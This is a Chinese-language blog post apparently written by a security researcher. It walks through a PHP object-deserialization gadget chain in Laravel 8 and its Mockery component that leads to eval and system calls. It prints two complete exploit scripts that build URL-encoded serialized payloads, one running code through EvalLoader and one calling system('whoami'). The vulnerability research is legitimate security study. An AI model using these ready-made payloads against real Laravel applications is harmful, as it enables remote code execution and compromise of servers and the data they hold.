forward
laravel的版本已經到了8;這裏分析一個laravel8的反序列化漏洞,但是讓我感到意外的是,這個漏洞竟然在低版本的laravel上依然可以存在,從根本來說這個漏洞是laravel的mockery組件漏洞,沒想到一直沒修;
本文涉及知識點實操練習:Fastjson反序列化漏洞 (Fastjson是阿里巴巴公司開源的一款json解析器,在1.2.48以前的版本中,攻擊者可以利用特殊構造的json字符串繞過白名單檢測,成功執行任意命令。)
text
首先還是老樣子,熟悉laravel的pop鏈的師傅肯定比較熟悉,入口點還是PendingBroadcast.php中的析構函數;
public function __destruct()
{
$this->events->dispatch($this->event);
}
這裏很明顯可以控制任意類下的dispatch函數;這裏還是選擇Dispatcher.php進行續鏈;
public function dispatch($command)
{
return $this->queueResolver && $this->commandShouldBeQueued($command)
? $this->dispatchToQueue($command)
: $this->dispatchNow($command);
}
這裏簡單的看下源碼,感興趣的師傅可以拿着laravel5的源碼來進行對比,這裏只不過是寫成了三元運算的形式,本質上還是一樣的,我們控制queueResolver變量和commandShouldBeQueued函數,使其返回爲真,這樣就可進入dispatchToQueue函數;這裏審計下類不難發現queueResolver是我們可控的變量,然而commandShouldBeQueued函數我們可以追溯一下;
protected function commandShouldBeQueued($command)
{
return $command instanceof ShouldQueue;
}
這裏不難發現,是需要我們的command是繼承ShouldQueue接口的類就可;所以全局搜索;選擇BroadcastEvent.php的類;然後便可返回true,然後進入dispatchToQueue函數;回溯一下dispatchToQueue函數;
public function dispatchToQueue($command)
{
$connection = $command->connection ?? null;
$queue = call_user_func($this->queueResolver, $connection);
可以發現這裏有個危險函數call_user_func;可以直接實現任意類下的任意方法;這裏就可直接跳轉到我們想要執行的方法下;全局搜索一下eval方法;發現存在;
class EvalLoader implements Loader
{
public function load(MockDefinition $definition)
{
if (class_exists($definition->getClassName(), false)) {
return;
}
eval("?>" . $definition->getCode());
}
}
call_user_func函數在第一個參數爲數組的時候,第一個參數就是我們選擇的類,第二個參數是類下的方法;所以這裏直接去到EvalLoader類,去執行load方法從而調用到eval函數;這裏發現存在參數,而且參數必須是MockDefinition類的實例;也即是意味着我們connection需要爲MockDefinition類的實例;
繼續審計發現,必須if爲false纔會觸發eval方法;所以這裏我們需要直接追溯到MockDefinition類中;
class MockDefinition
{
protected $config;
protected $code;
public function __construct(MockConfiguration $config, $code)
{
if (!$config->getName()) {
throw new \InvalidArgumentException("MockConfiguration must contain a name");
}
$this->config = $config;
$this->code = $code;
}
public function getConfig()
{
return $this->config;
}
public function getClassName()
{
return $this->config->getName();
}
public function getCode()
{
return $this->code;
}
}
看下getClassName函數;這裏的config是可控的,所以我們直接找到一個存在getName方法並且可控該方法的類;全局搜索下找到MockConfiguration.php可以實現;
protected $name;
public function getName()
{
return $this->name;
}
因爲最後是要經過class_exit函數的判斷的,所以我們可以直接控制其返回一個不存在的類,就會造成false從而進入eval方法;繼續回到eval方法;
class EvalLoader implements Loader
{
public function load(MockDefinition $definition)
{
if (class_exists($definition->getClassName(), false)) {
return;
}
eval("?>" . $definition->getCode());
}
}
這裏還有個getCode方法,我們通過上面的類也可審計getCode方法;code在MockDefinition類中也是可控的,所以我們可以隨意的控制其內容,那麼我們就可命令執行;放出我exp:
<?php
namespace Illuminate\Broadcasting{
use Illuminate\Contracts\Events\Dispatcher;
class PendingBroadcast
{
protected $event;
protected $events;
public function __construct($events, $event)
{
$this->event = $event;
$this->events = $events;
}
}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
public $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace Mockery\Loader{
use Mockery\Generator\MockDefinition;
class EvalLoader
{
public function load(MockDefinition $definition)
{}
}
}
namespace Mockery\Generator{
class MockConfiguration
{
protected $name;
public function __construct($name){
$this->name = $name;
}
}
}
namespace Mockery\Generator{
class MockDefinition
{
protected $config;
protected $code;
public function __construct($config,$code)
{
$this->config = $config;
$this->code = $code;
}
}
}
namespace{
$e = new Mockery\Generator\MockConfiguration('s1mple');
$d = new Mockery\Loader\EvalLoader();
$f = new Mockery\Generator\MockDefinition($e,'<?php phpinfo();?>');
$c = new Illuminate\Broadcasting\BroadcastEvent($f);
$a = new Illuminate\Bus\Dispatcher(array($d,"load"));
$b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
echo urlencode(serialize($b));
}
這裏爲了節省時間,我最後用abcdef直接代替了,造成rce;
細心的師傅想必也發現了;在最開始的call_user_func處,也是可以進行命令執行的;
public function dispatchToQueue($command)
{
$connection = $command->connection ?? null;
$queue = call_user_func($this->queueResolver, $connection);
這裏可以直接控制進行命令執行;這個很簡單,就直接放出我exp吧;
<?php
namespace Illuminate\Broadcasting{
use Illuminate\Contracts\Events\Dispatcher;
class PendingBroadcast
{
protected $event;
protected $events;
public function __construct($events, $event)
{
$this->event = $event;
$this->events = $events;
}
}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
public $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace{
$c = new Illuminate\Broadcasting\BroadcastEvent('whoami');
$a = new Illuminate\Bus\Dispatcher('system');
$b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
echo urlencode(serialize($b));
}